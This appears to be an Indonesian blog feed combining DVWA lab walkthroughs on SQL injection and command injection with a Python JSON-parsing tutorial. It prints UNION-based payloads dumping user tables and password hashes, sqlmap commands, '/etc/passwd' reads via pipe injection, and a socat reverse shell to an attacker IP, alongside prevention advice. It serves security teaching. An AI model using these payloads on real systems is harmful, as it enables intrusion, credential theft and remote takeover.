Pada level ini terdapat perbedaan tentang cara melakukan inputan. Sekarang form inputan berada di halaman cookie-input.php (lalu nilanya dijadikan cookie) dan hasilnya akan ditampilkan di halaman index.php. kita buat error(false)

Setelah mengetahui pesan jika melakukan kesalahan, selanjutnya saya mencoba menggunakan payload berikut untuk melihat apakah hasilnya bernilai true atau false:

1 or 1 = 1#

Cara mengatasi

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '<pre>User ID exists in the database.</pre>';
        }
        else {
            // User wasn't found, so the page wasn't!
            header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

            // Feedback for end user
            echo '<pre>User ID is MISSING from the database.</pre>';
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Caranya sama seperti sql injection biasa.

DVWA Series: SQL Injection

Mon, 03 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu SQL Injection?

SQL injection adalah sebuah teknik hacking untuk mendapatkan akses pada sistem database yang berbasis SQL. SQL sendiri merupakan singkatan dari Structured Query Language yaitu bahasa yang digunakan untuk membuat serta mengolah database. Dalam melakukan teknik SQL injection, para peretas akan memanfaatkan celah keamanan pada web atau aplikasi. Mereka akan memasukkan perintah-perintah SQL ke dalam database mesin server sehingga mereka dapat masuk ke dalam sistem tanpa harus memiliki username dan password administrator. SQL injection ini dapat terjadi karena beberapa hal seperti kurangnya penanganan terhadap karakter-karakter seperti tanda petik satu atau karakter double minus yang dapat menyebabkan suatu aplikasi dapat disisipi peretas dengan perintah SQL.

Security Level: Low

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

Information Gathering

Terdapat form input dimana user diminta untuk memasukkan ID kemudaian nanti akan muncul data First name dan Surename yang diambil dari database (semacam mesin pencarian).

Dan kalau kita kihat, http method yang dipakai adalah GET sehingga kita bisa lihat data yang dikirim lewat URL. Kemudian untuk mencari tahu apakah form ini memiliki celah SQL Injection, kita bisa mencobanya dengan meng-inputkan kutip satu (') boleh pada url maupun fada form input. Maka akan mucul error sebagai berikut:

Jika terdapat error. Ini berarti kita bisa melakukan SQL Injection. Kenapa error? karena ketika kita menginputkan kutip satu, maka query yang dijalankan oleh server akan seperti berikut:

SELECT first_name, last_name FROM users WHERE user_id = '$id'';

terdapat tanda kutip yang tidak memiliki pasangan (makanya biar kita ga ikutan error harus punya pasangan wkwk).

Launch Attack

Untuk menampilkan semua record pada tabel maka kita harus memasukkan payload yang nanti mengembalikan nilai true. berikut payloadnya:

%' or '1' = '1

sehingga kuery yang di eksekusi server menjadi

SELECT first_name, last_name FROM users WHERE user_id = %' or '1' = '1';

Tanda % tidak sama dengan apapun dan akan mengembalikan nilai salah (False). Queri ‘1’=‘1’ mengembalikan nilai True karena 1 akan selalu sama dengan 1. maka False atau True akan mengembalikan True

Menampilkan User Database

Untuk menampilkan pengguna Database yang mengeksekusi kode PHP menggunakan payload:

%' or 1=1 union select null, user() #

Sehingga hasil query yang dijalankan server adalah:

SELECT first_name, last_name FROM users WHERE user_id = '%' or 1=1 union select null, user() #';

Menampilkan Nama Database

%' or 1=1 union select null, database() #

Sehingga query yang dijalankan menjadi

SELECT first_name, last_name FROM users WHERE user_id = '%' or 1=1 union select null, database() #';

Menampilkan Versi Database

Untuk mengetahui versi database yang menjalankan aplikasi DVWA

%' or 1=1 union select null, version() #

Menampilkan Semua tabel pada information_schema

information_schema menyimpan informasi tentang tabel, kolom, dan semua database lain yang dikelola oleh MySQL. Untuk menampilkan semua tabel yang ada di information_schema, Gunakan payload:

%' and 1=1 union select null, table_name from information_schema.tables #

Sehingga query yang dijalankan menjadi

SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=1 union select null, table_name from information_schema.tables #';

Menampilkan Semua Tabel yang Mengandung Kata User pada Information_schema

%' and 1=1 union select null, table_name from information_schema.tables where table_name like 'user%'#

Maka query yang dijalankan menjadi

SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=1 union select null, table_name from information_schema.tables where table_name like 'user%'#';

Menampilkan Semua Kolom pada Tabel User

%' and 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Sehingga query yang dieksekusi adalah

SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #';

Menampilkan Semua Isi dari Tabel User

%' and 1=1 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Query yang dijalankan

SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=1 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #';

Dilihat bahwa semua data telihat. Jika kita perhatikan pada kolom pasword terdapat string acak yang merupakan Message diggest atau hasil dari hash. Dan kalau diperhatikan lagi hash tersebut terdapat 32 karakter yang merupakan ciri dari fungsi hash MD5. Karena MD5 adalah fungsi hash yang lemah dan pada jaman sekarang sudah tidak disarankan untuk digunakan. Kita dapat melihat plain text dari string hash tersebut dengan melakukan dictionary attack. Bisa menggunakan tool online.

Menyerang menggunakan SQLMap

Jika tidak mau bingung dengan query di atas, kita bisa menggunakan automation tools seperti SQLMap. Pertama-tama kita tentukan terlebih dahulu method yang digunakan. Pada kasus ini, method yang digunakan adalah GET. Dan endpoint pada kasus ini adalah:

http://192.168.1.6/vulnerabilities/sqli/?id=1&Submit=Submit#

Kita bisa cek database yang ada dengan menjalan kan perintah:

sqlmap -u 'http://192.168.1.6/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie "PHPSESSID=dnluhm0tj00oo3g678re07cvl0; security=low" --dbs

-u digunakan untuk menentukan URL atau endpoint --cookie digunakan untuk menetukan cookie. --dbs digunakan untuk melihat database yang tersedia.

Hasilnya ada 2 yaitu dvwa dan information_schema.

Cek Tabel yang ada Dalam DB dvwa

sqlmap -u 'http://192.168.1.6/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie "PHPSESSID=dnluhm0tj00oo3g678re07cvl0; security=low" -D dvwa --tables

Keterangan: -D = menentukan database. --tables = melihat table dari database

Cek Kolom pada Tabel Users

sqlmap -u 'http://192.168.1.6/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie "PHPSESSID=dnluhm0tj00oo3g678re07cvl0; security=low" -D dvwa -T users --columns

Keterangan: -D = menentukan database. -T = melihat table dari database --columns = melihat kolom

Dump Tabl Users

sqlmap -u 'http://192.168.1.6/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie "PHPSESSID=dnluhm0tj00oo3g678re07cvl0; security=low" -D dvwa -T users --dump

Keterangan: --dump akan meng-crack password yang di-hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMap atau dictionary kita sendiri.

Security Level: Medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

Information Gathering

Id pertama kali diproses oleh fungsi mysqli_real_escape_string. Menurut dokumentasi, https://www.php.net/manual/en/mysqli.real-escape-string.php. Fungsi akan meng-escape beberapa karakter yang diblacklist termasuk kutipan tunggal. Namun, bidang id masih digabungkan ke kueri secara langsung sehingga masih dapat di injeksi.

Pada level ini form yang digunakan adalah bertipe select dan method yang digunakan adalah POST. Sehingga untuk mencoba merubah parameter-nya, kita bisa menggunakan tool Burp suite seperti berikut:

Jika kita ubah nilai parameter id-nya menjadi ’, maka pesan error-nya akan berbeda dibanding level sebelumnya.

Walaupun errornya berbeda. Namun itu sudah menandakan bahwa web tersebut mempunyai celah SQL Injection.

Ada penambahan backslash () sebelum karakter ‘. Ini dikarenakan fungsi mysqli_real_escape_string() yang melakukan encoding pada spesial karakter seperti yang dijelaskan di atas. Sehingga sekarang kita tidak bisa menggunakan payload pada level sebelumnya seperti:

%' or '1' = '1

Maka dari itu kita harus menggunakan cara lain, yaitu mencari payload yang tidak menggunakan spesial karakter. Jawaban yang saya temukan adalah menggunakan union!

Launch Attack

Untuk menampilkan semua list kita bisa menggunakan payload

1+or+1=1

Semua vektor yang digunakan dalam level low harus bisa digunakan setelah melalui penyesuaian yang sama.

Contoh saja, berikut menampilkan password pada tabel user

1+++union+select+1,group_concat(0x7c,password,0x7C)+from+dvwa.users+--+

maka menghasilkan:

Atau ketika ingin menampilkan semua isi tabel users menggunakan payload

union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users

maka menampilkan:

Menggunakan SQLMap

Salah satu cara termudah untuk menggunakan SQLMap (apa lagi dengan method POST) adalah dengan bantuan Burp suite, yaitu dengan meng-intercept request lalu di salin ke suatu file (contohnya req.txt).

POST /vulnerabilities/sqli/ HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/vulnerabilities/sqli/
Cookie: PHPSESSID=ceirrk20orjsosubae4allmun1; security=medium
Upgrade-Insecure-Requests: 1

id=1&Submit=Submit

Selanjutnya adalah menjalankan SQLMap:

sqlmap -r req.txt --dbs

Keterangan: -r berarti membaca file.

maka hasilnya:

silahkan lanjutkan hingga mendapat credential dari user.

Security Level: High

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Pada level ini terdapat perbedaan tentang cara melakukan inputan. Sekarang form inputan berada di halaman session-input.php (berupa pop-up window) lalu nilainya dijadika session dan hasilnya ditampilkan di halaman index.php

Coba kita jalankan payload sebelumnya pada level low :

%' or '1'='1

Kueri memiliki postfix LIMIT 1 untuk mencegah menampilkan jumlah catatan yang dikembalikan secara tidak terduga . Kemudian karakter tidak di escape. Dengan asumsi bahwa bidang id masih digabungkan ke query secara langsung, coba komentari sisa query menggunakan #.

%' or '1'='1';#

Launch Attack

Setelah mengumpulkan informasi, kita akan mulai melakukan SQL Injection dengan payload seperti berikut:

%' or '1' = '1'#

SELECT first_name, last_name FROM users WHERE user_id = '%' or '1' = '1'#' LIMIT 1;

Sebagai contoh kita bisa mencari semua isi tabel users menggunakan payload:

1' union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users; #

Cara Mencegah SQL Injection

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Menggunakan Parameterized SQL Query

Penggunaan Parameterized SQL Query atau prepared statement dapat memudahkan dalam membedakan antara data yang diinput user dengan SQL Statement

Menonaktifkan Error

Dengan menonaktifkan mode-debug pada aplikasi maka pesan error tidak akan ditampilkan sehinga pesan error tersebut tidak dimanfaatkan peretas

Tambahkan Escape Character

Gunakan escape karakter yang memiliki makna khusus di SQL seperti ; " dll

Lakukan Validasi Input (Pattern Check)

Dilakukan untuk memberikan batasan hak akses

Gunakan WAF (Web Application Firewall)

Digunakan untuk mendeteksi dan memblo serangan SQL Injection

Lakukan Testing Secara Berkala

Baik penetration testing, vulnerability assesment dan lain lain. kemudian perbaiki celah sesegera mungkin.

Amankan Database yang Digunakan

Dengan mengimplementasikan least privileged (memberikan hak akses pengguna sesuai yang diperlukan dan seminimal mungkin) kemudian gunakan enkripsi, nonaktifkan remote access dari publik, jangan gunakan default credential, dan ganti password secara berkala.

DVWA Series: Command Injection

Sun, 02 Jan 2022 00:00:00 GMT

Intro

Disclaimer

Apa itu Command Injection ?

Command Injection adalah serangan yang mana tujuannya adalah mengeksekusi perintah secara sewenang-wenang pada sistem operasi melalui aplikasi yang rentan. Serangan command injection bisa terjadi ketika sebuah aplikasi (forms, cookies, HTTP headers, dll) bisa menjalankan perintah yang tidak aman dari inputan user ke sistem shell.

Biasanya, hak akses yang dimiliki oleh peretas akan sama dengan aplikasi yang rentan tersebut. Misalnya, di DVWA ini terdapat kerentanan command injection dan aplikasi ini berjalan dengan user www-data pada sistem operasi linux, sehingga peretas akan menjalankan perintah pada komputer target sebagai user www-data tersebut.

Untuk lebih jelasnya bisa lihat video berikut:

Apa itu Shell?

Maksud kata “command” di sini apa? apakah perintah pada bahasa pemrograman? Jawabannya adalah perintah dari shell yang digunakan oleh user di komputer tersebut. Umumnya, Unix dan Linux menggunakan Bash sebagai shell default-nya. Sedangkan di Windows terdapat Command Prompt dan PowerShell.

Pengetahuan Dasar yang Wajib Dimiliki

Pengetahuan dasarnya adalah memahami perintah perintah pada Linux atau Powershell.

Pada bagian akhir akan dibahas bagaimana cara meminimalisir serangan bruteforce pada web kita.

Command Injection level Low

Berikut adalah source-code dari command injection level low di DVWA.

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>

Information Gathering

shell_exec() adalah fungsi bawaan PHP yang berfungsi untuk menjalankan perintah melalui shell dan mengembalikan output yang lengkap sebagai string. Dapat dilihat bahwa aplikasi ini akan menjalankan ping ke sebuah target. contoh penggunaan ping sebagai berikut:

Jika diperhatikan dalam source codenya tidak ada validasi sama sekali pada inputan. Maka kita bisa menambahkan beberapa karakter seperti ; , | , atau &&

Attack

Setelah mengetahui bahwa tidak ada validasi input, kita bisa memanfaatkan && untuk menjalankan perintah lainnya. Seperti contohnya mastoto.my.id && cat /etc/passwd . Nanti outpunya berupa hasil ping diikuti dengan list dari user,group dll yang ada dalam sistem. Maka outptnya menjadi

Kerentanan ini sangat berbahaya karena dengan kerentanan ini penyerang dapat melakukan perintah yang bisa saja membahayakan sistem seperti membuat backdoor, dll.

Tidak sampai disini saja. Penyerangan ini bisa membuat backdoor dan berlanjut hingga Post Exploitation, dan penyerang mempertahankan koneksi agar serangan tersebut persistent menggunakan metode Reverse Shell ataupun Bind Shell.

Command Injection level Medium

Berikut adalah source-code dari command injection level medium di DVWA.

 <?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

Information Gathering

Terlihat bahwa pada code tersebut terdapat blacklist untuk string && dan ; pada inputan. Tetapi terdapat alternatf lain untuk menjalankan 2 perintah atau lebih yaitu dengan menambahkan karakter |.

Attack

Maka cukup kita ganti saja yang awalnya menggunakan && dengan | menjadi mastoto.my.id | cat /etc/passwd.

lebih jelas bisa baca di https://www.educba.com/linux-pipe-command/

Command Injection level High

Berikut adalah source-code dari command injection level high di DVWA.

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

Information Gathering

Pada level ini, blacklist yang diberikan menjadi semakin banyak. Tetapi jika kita teliti, di baris ke-11 terdapat celah . '| ' => '' terdapat spasi setelah | . Ini bisa kita manfaatkan dengan cara menjalankan perintah langsung tanpa spasi setelah |.

Attack

Maka cukup kita gunakan pipe namun tidak perlu kita beri spasi setelah | menjadi mastoto.my.id |cat /etc/passwd.

Gimana Cara Mencegah Command Injection?

Di dalam DVWA juga menyediakan level Imposible dimana pada saat level di setting menjadi imposible maka serangan mustahil untuk berhasil. Berikut source-codenya:


 <?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Pada level imposible ini, Input dari user hanya bisa menggunakan angka (tipe data numeric) saja. Sehingga ketika kita memasukkan karakter lain maka akan muncul pesan error. Kedua pada kode di atas menggunakan CSRF token, yang pada Artikel sebelumnya sudah saya jelaskan.

Sejauh ini cara paling efektif untuk mencegah kerentanan Command Injection OS adalah dengan tidak pernah memanggil perintah OS dari kode. Di hampir setiap kasus, ada cara alternatif untuk mengimplementasikan fungsionalitas yang diperlukan menggunakan API platform yang lebih aman. Jika dianggap tidak dapat dihindari untuk memanggil perintah OS dengan input yang disediakan pengguna, maka validasi input yang kuat harus dilakukan. Beberapa contoh validasi yang efektif meliputi:

Memvalidasi terhadap whitelist nilai yang diizinkan.
Memvalidasi bahwa input adalah angka.
Memvalidasi bahwa input hanya berisi karakter alphanumerik, tidak ada sintaks atau whitespace lainnya.

Jangan pernah mencoba mensanitasi input dengan cara escaping shell metacharacters. Dalam praktiknya, ini terlalu rawan kesalahan dan rentan untuk dilewati oleh penyerang yang terampil.

Bonus : Reverse Shell

Seperti yang sudah di jelaskan sebelumnya, kerentanan command injection sangat berbahaya dan penyerang bisa mengambil alih server. Untuk mengambil alih server pertama tama yang harus dilakukan adalah mempertahankan koneksi dan melalukan Privillege Escalation(akan dibahas dikemudian hari). Pada kali ini saya akan membahas Reverse Shell dengan memanfaatkan kerentanan Command injection.

Information Gathering

Biasanya ketika melakukan reverse shell, saya menggunakan netcat, namun ketika coba saya cari dalam server dvwa tidak ada netcat. Bisa diketahui dengan menajankan perintah mastoto.my.id |nc -h dan tidak ada output yang muncul. Untuk memastikan, saya menjalankan perintah untuk melihat daftar apt yang ada dengan perintah mastoto.my.id |apt list dan ternata benar netcat tidak terinstal. Saya coba mencari metode lain dan akhirnya menemukan sumber bahwa kita bisa melakukan Reverse Shell menggunakan socat pada link https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/

Pertama pada komputer milik penyerang jalankan perintah:

socat -d -d TCP4-LISTEN:4444 STDOUT

Sehingga muncul: Penjelasan :

Dalam dokumentasinya -d -d digunakan untuk increase verbosity (use up to 4 times; 2 are recommended)

TCP4-LISTEN:<port> merupakan address-head yang digunakan untuk menerima koneksi

STDOUT Untuk lebih jelasnya bisa melihat dokumentasi socat. Bisa dilihat menggunakan perintah man socat

Kemudian pada form input kita masukkan perintah:

socat TCP4:<IP>:<port> EXEC:/bin/bash

menjadi

mastoto.my.id |socat TCP4:192.168.1.7:4444 EXEC:/bin/bash

Jika mesin korban menggunakan windows maka menggunakan perintah:

socat TCP4:192.168.168.1:4443 EXEC:'cmd.exe',pipes

Sehingga web akan loading terus dan tampilan pada terminal attacker akan berubah menjadi:

Kita coba jalankan perintah whoami, cat /etc/passwd, dan coba kita pindah ke direktori /tmp. Dapat dilihat bahwa command tersebut dapat tereksekusi.

Parsing JSON with Python

Sat, 01 Jan 2022 00:00:00 GMT

REST API ?

API merupakan singkatan dari Application Interface Programming, yang secara singkatnya API bisa digunakan oleh seorang Developer untuk mengintegrasikan aplikasi yang berada di platform ataupun perangkat yang berbeda agar bisa saling terkoneksi antara satu dengan lainnya. Kita dapat menganggap API sebagai mediator antara pengguna atau klien dan sumber daya atau web service yang ingin mereka dapatkan. Ini juga merupakan cara bagi organisasi untuk berbagi sumber daya dan informasi sambil mempertahankan keamanan, kontrol, dan autentikasi (menentukan siapa yang mendapatkan akses ke apa). Tujuan utama kenapa API digunakan dalam pembuatan sebuah software adalah untuk saling berbagi data antara aplikasi dari platform yang sama maupun yang berbeda.

Sedangkan REST merupakan kependekan dari Representational State Transfer. REST merupakan sebuah web service yang berjalan di client dan server yang bersifat stateless. Yang mempunyai arti bahwa setiap request yang dikirim oleh aplikasi maka harus menyertakan semua parameter dan datanya dengan lengkap. Secara singkat cara kerjanya adalah client akan menjalankan request ke server REST, ketika request terkirim ke server selanjutnya server akan memberikan response. Informasi ini, atau representasi, disampaikan dalam salah satu dari beberapa format melalui HTTP: JSON (Javascript Object Notation), HTML, XLT, Python, PHP, atau teks biasa. Sumber: https://www.redhat.com/en/topics/api/what-is-a-rest-api

Sumber:(https://www.altexsoft.com/media/2021/03/word-image.png)

Mari Kita Coba

Untuk kali ini saya menggunakan API dari Dummy JSON untuk isi data JSON kira kira seperti ini

{
  "users": [
    {
      "id": 1,
      "firstName": "Terry",
      "lastName": "Medhurst",
      "maidenName": "Smitham",
      "age": 50,
      "gender": "male",
      "email": "atuny0@sohu.com",
      "phone": "+63 791 675 8914",
      "username": "atuny0",
      "password": "9uQFF1Lh",
      "birthDate": "2000-12-25",
      "image": "https://robohash.org/hicveldicta.png?size=50x50&set=set1",
      "bloodGroup": "A−",
      "height": 189,
      "weight": 75.4,
      "eyeColor": "Green",
      "hair": {
        "color": "Black",
        "type": "Strands"
      },
      "domain": "slashdot.org",
      "ip": "117.29.86.254",
      "address": {
        "address": "1745 T Street Southeast",
        "city": "Washington",
        "coordinates": {
          "lat": 38.867033,
          "lng": -76.979235
        },
        "postalCode": "20020",
        "state": "DC"
      },
      "macAddress": "13:69:BA:56:A3:74",
      "university": "Capitol University",
      "bank": {
        "cardExpire": "06/22",
        "cardNumber": "50380955204220685",
        "cardType": "maestro",
        "currency": "Peso",
        "iban": "NO17 0695 2754 967"
      },
      "company": {
        "address": {
          "address": "629 Debbie Drive",
          "city": "Nashville",
          "coordinates": {
            "lat": 36.208114,
            "lng": -86.58621199999999
          },
          "postalCode": "37076",
          "state": "TN"
        },
        "department": "Marketing",
        "name": "Blanda-O'Keefe",
        "title": "Help Desk Operator"
      },
      "ein": "20-9487066",
      "ssn": "661-64-2976",
      "userAgent": "Mozilla/5.0 ..."
    },
    {...},
    {...}
    // 30 items
  ],
  "total": 100,
  "skip": 0,
  "limit": 30
}

Pertama import library Python yang dibutuhkan

import requests
import csv

Kemudian masukkan url dari API, dan untuk mendapatkan data JSON dari API tersebut kita harus melakukan GET request terlebih dahulu.

# Kita memakai dummy data dari url berikut
url = 'https://dummyjson.com/users'

# GET Request ke endpoint API
response = requests.get(url)

Untuk mengetahui apakah GET request kita berhasil, kita perlu melakukan pengecekkan dengan memastikan bahwa Endpoint API mengembalikan response dengan HTTP code 200 atau OK

# Periksa kode HTTP selain 200
if response.status_code != 200:
    print('Status:', response.status_code, 'Ada masalah dengan permintaan. Keluar.')
    exit()

Lalu data JSON yang kita dapatkan, kita convert ke Python object.

# Load JSON encoded string ke Python object (akan mengembalikan json-encoded content dari response, jika ada.)
users = response.json()

Kita perlu definisikan key mana yang akan dipakai karena jika kita lihat respon JSON dari API tidak langsung menampilkan data user. Respon JSON tersebut menampilkan beberapa key yaitu users, total, skip, limit sebagai berikut:

{
  "users": [{...}],
  "total": 100,
  "skip": 0,
  "limit": 30
}

Maka kita perlu definisikan bahwa kita akan memakai data dari key users.

# Definisikan key mana yang mau dipakai
user_list = users['users']

Lanjut, kita mulai sesi penginputan ke CSV, pertama kita open dulu file csv dengan statement with dan dalam mode write (apabila file yang di-open belum ada, maka akan otomatis terbuat). 'w' Berarti Write, dan 'list-users.csv' adalah nama filenya.

# Masukkan ke CSV
with open('list-users.csv', 'w') as t:
    writer = csv.writer(t)

Kemudian kita buat header CSV dengan menggunakan method `writerow’

# Header CSV nya
writer.writerow(("First Name", "Last Name", "Gender", "Home Address", "City", "Company Name", "Company Address", "Company Coordinate"))

Setelah itu kita lakukan looping untuk setiap data yang kita dapat, kemudian kita parsing data tersebut dan kita tuliskan data tersebut ke dalam file CSV.

# Looping data yang di dapat
for user in user_list:
    first_name = user['firstName']
    last_name = user['lastName']
     gender = user['gender']
     home_address = user['address']['address']
     city = user['address']['city']
     company_name = user['company']['name']
     company_address = user['company']['address']['address']
     lat = user['company']['address']['coordinates']['lat']
     lng = user['company']['address']['coordinates']['lng']
     geo = f'({lat},{lng})'

     # Masukkan data tsb ke CSV mengikuti format yang sudah kita tentukan
     csv_data = (first_name, last_name, gender, home_address, city, company_name, company_address, geo)
     writer.writerow(csv_data)

Selesai. Jika kita buka file CSV hasil maka akan terlihat sebagai berikut:

Full Code-nya

import requests
import csv

# Kita memakai dummy data dari url berikut
url = 'https://dummyjson.com/users'

# GET Request ke endpoint API
response = requests.get(url)

# Periksa kode HTTP selain 200
if response.status_code != 200:
    print('Status:', response.status_code, 'Ada masalah dengan permintaan. Keluar.')
    exit()

# Load JSON encoded string ke Python object (akan mengembalikan json-encoded content dari response, jika ada.)
users = response.json()

# Definisikan key mana yang mau dipakai
user_list = users['users']

# Masukkan ke CSV
with open('list-users.csv', 'w') as t:
    writer = csv.writer(t)

    # Header CSV nya
